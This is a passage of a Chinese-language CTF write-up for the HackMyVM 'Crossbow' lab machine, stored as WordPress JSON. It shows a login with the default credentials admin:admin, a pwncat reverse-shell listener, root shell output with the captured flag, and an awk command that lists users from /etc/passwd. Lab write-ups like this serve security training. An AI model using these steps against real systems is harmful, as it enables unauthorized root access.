\/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5f31\u5bc6\u7801\u548c\u4e07\u80fd\u5bc6\u7801\uff0c<code>admin:admin<\/code>\u767b\u5f55\u8fdb\u53bb\u4e86\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205695.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205695.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403215519333\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205696.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205696.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403215734426\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4fdd\u5b58\u4e00\u4e0b\uff08\u6eda\u8f6e\u5f80\u4e0b\u6ed1\uff09\u3002<\/p>\n<p>\u5728\u672c\u5730\u8bbe\u7f6e\u4e00\u4e2a\u76d1\u542c\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo pwncat-cs -lp 1234 2&gt;\/dev\/null<\/code><\/pre>\n<p>\u7136\u540e\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205697.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205697.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403215930500\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205698.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205698.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403220019000\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u51fa\u73b0\u4e86\u4e00\u4e2a\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-text\">ERROR: Ansible could not initialize the preferred locale: unsupported locale setting<\/code><\/pre>\n<p>\u6ca1\u6709\u8bbe\u7f6e\u5730\u533a\uff0c\u8bbe\u7f6e\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205699.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205699.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403220312094\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">{\n    &quot;LC_ALL&quot;:&quot;en_US.UTF-8&quot;,\n    &quot;LANG&quot;:&quot;en_US.UTF-8&quot;\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205700.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205700.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403220339999\" \/><\/div><\/p>\n<p>\u7136\u540erootshell\u5c31\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205701.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205701.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403220444891\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205702.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205702.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403220434285\" \/><\/div><\/p>\n<p>\u5bfb\u627eflag\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) root@crossbow.hmv:\/root# whoami;id\nroot\nuid=0(root) gid=0(root) groupes=0(root)\n(remote) root@crossbow.hmv:\/root# cd \/root\n(remote) root@crossbow.hmv:\/root# ls\nclean.yml  config.json  root.txt\n(remote) root@crossbow.hmv:\/root# cat root.txt \n7a299c41b1daac46d5ab98745b212e09<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<h3>\u770b\u5230\u5e08\u5085\u7528\u6b63\u5219\u8fc7\u6ee4\u7528\u6237\u5f88\u4f18\u96c5<\/h3>\n<p><a href=\"https:\/\/emvee-nl.github.io\/posts\/HackMyVM-Writeup-Crossbow\/\">https:\/\/emvee-nl.github.io\/posts\/HackMyVM-Writeup-Crossbow\/<\/a><\/p>\n<pre><code class=\"language-bash\">awk -F: &#039;($3&gt;=1000)&amp;&amp;($1!=&quot;nobody&quot;){print $1}&#039; \/etc\/passwd<\/code><\/pre>\n<p>\u4ed6\u4e5f\u7ed9\u4e86\u4e00\u4e2a\u53c2\u8003\uff1a<a href=\"https:\/\/askubuntu.com\/questions\/979911\/strange-folder-in-tmp-with-name-ssh\">https:\/\/askubuntu.com\/questions\/979911\/strange-folder-in-tmp-with-name-ssh<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Crossbow \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.3 &#8212; -A Open 1 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-498","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=498"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/498\/revisions"}],"predecessor-version":[{"id":499,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/498\/revisions\/499"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=498"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}